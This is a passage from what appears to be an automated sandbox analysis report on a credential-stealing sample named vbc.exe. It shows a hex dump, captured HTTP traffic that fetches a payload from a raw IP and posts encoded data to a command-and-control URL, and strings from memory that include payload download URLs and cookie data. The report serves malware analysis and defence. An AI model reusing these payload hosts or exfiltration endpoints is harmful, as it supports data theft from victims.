00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 56 00 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 30 00 00 84 24 00 00 03 00 00 00 01 00 00 06 24 55 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 36 00 00 00 01 00 00 11 00 28 01 00 00 0a 8c 04 00 00 01 28 02 00 00 0a 00 28 04 00 00 06 28 03 00 00 0a 6f 04 00 00 0a 00 28 06 00 00 06 00 28 08 00 00 06 00 16 0a 38 00 00 00 00 06 2a 00 00 22 02 28 05 00 00 0a 00 2a 00 00 00 ee 00 d0 0a 00 00 01 28 06 00 00 0a 72 01 00 00 70 17 8d 0b 00 00 01 25 16 d0 0a 00 00 01 28 06 00 00 0a a2 28 07 00 00 0a 14 17 8d 01 00 00 01 25 16 02 50 a2 6f 08 00 00 0a 26 2a 13 30 04 00 2e 00 00 00 02 00 00 11 00 73 09 00 00 0a 25 72 11 00 00 70 6f 0a 00 00 0a 00 25 72 19 00 00 70 6f 0b 00 00 0a 00 25 17 6f 0c 00 00 0a 00 0a 38 00 00 00 00 06 2a 00 00 22 02 28 05 00 00 0a 00 2a 00 00 00 1b 30 03 00 54 00 00 00 03 00 00 11 00 00 20 00 0c 00 00 28 0d 00 00 0a 00 00 dd 08 00 00 00 26 00 00 dd 00 00 00 00 72 35 00 00 70 28 0e 00 00 0a 6f 0f 00 00 0a 6f 10 00 00 0a 73 11 00 00 0a 20 d7 5e 5b 05 6f 12 00 00 0a 0a 12 00 28 03 00 00 06 00 2
              Source: global trafficHTTP traffic detected: GET /22/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.218.119Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /azo01/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: clamprite.gaContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3a 70 9d 3a 70 9d 37 70 9d 37 13 8b 30 65 8b 30 60 8b 30 6d 8b 31 11 8b 30 6d ea 26 66 9a 45 70 9d 36 10 8b 30 67 ed Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp:p:p7p70e0`0m10m&fEp60g
              Source: global trafficHTTP traffic detected: POST /azo01/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: clamprite.gaContent-Length: 100266Cache-Control: no-cache
              Source: vbc.exe, 00000009.00000002.675417727.00000000004F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com@ equals www.linkedin.com (Linkedin)
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.677445164.0000000004BC4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676901801.0000000004850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.linkedin.comFALSE/FALSE1610149366bscookie"v=1&2017101711050791d7050a-8506-4640-807b-cc108f29e94eAQGV-VPMFWWUgMh0fauayNjqc88aDC5-" equals www.linkedin.com (Linkedin)
              Source: vbc.exe, 00000009.00000002.675417727.00000000004F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: vbc.exe, 00000009.00000002.675266349.0000000000300000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.675374613.00000000004C4000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.675417727.00000000004F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clamprite.ga/azo01/index.php
              Source: vbc.exe, 00000009.00000002.675417727.00000000004F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clamprite.ga/azo01/index.phph
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: vbc.exe, 00000004.00000002.605817686.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://etapackbg.com
              Source: vbc.exe, Pthmzffh.exeString found in binary or memory: http://etapackbg.com/css/Sngggz.png
              Source: vbc.exe, 00000004.00000002.605581813.0000000000F22000.00000020.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.459111819.0000000000F22000.00000020.00000001.01000000.00000003.sdmp, vbc.exe, 00000009.00000000.599486854.0000000000F22000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://etapackbg.com/css/Sngggz.png;Apwjojdzaicrizygsmmd.Zpaxmptx
              Source: vbc.exe, vbc.exe, 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: vbc.exe, 00000004.00000002.605817686.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 